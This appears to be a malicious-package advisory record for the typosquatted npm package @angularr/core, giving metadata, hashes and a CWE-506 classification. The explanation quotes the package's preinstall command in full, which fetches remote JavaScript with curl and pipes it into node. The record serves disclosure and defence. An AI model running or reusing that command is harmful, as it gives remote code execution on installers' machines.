-= Per source details. Do not edit below this line.=-
The package's npm preinstall lifecycle script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every npm install. The destination (gitflic.ru under a user path hellscripter/install-scripts, routed via a web.archive.org proxy) is unrelated to any @angular publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name @angularr/core is a one-letter variant of the widely-used @angular/core, increasing the likelihood of accidental installation.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020907",
"import_time": "2026-10-04T23:40:40.722354757Z",
"modified_time": "2026-10-04T23:17:47Z",
"sha256": "801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365",
"source": "amazon-inspector",
"versions": [
"1.0.67"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "b4adcb75bc096e8e9bcb96750398a08e346c1914e02625efd7cda80e5b02d4fe",
"tlsh": "38117b20dd8c5ea316c20af928bdc801d565081b4d94fc9cf3ea040d8f5eaaf717a55e"
}
],
"package_integrity": [
{
"filename": "core-1.0.67.tgz",
"hashes": {
"sha1": "cd7d832fd965a3ae717487fa919671ae562cd627",
"sha512_sri": "sha512-bnBOACox7QJf/0xM3+8AFuYOUaDgjhzXEhLVKGVezTAr8oT+Ke298z01rVrAiAPdUwHEJ7rddskNKtFHRR/g8A=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/core/MAL-2026-17493.json"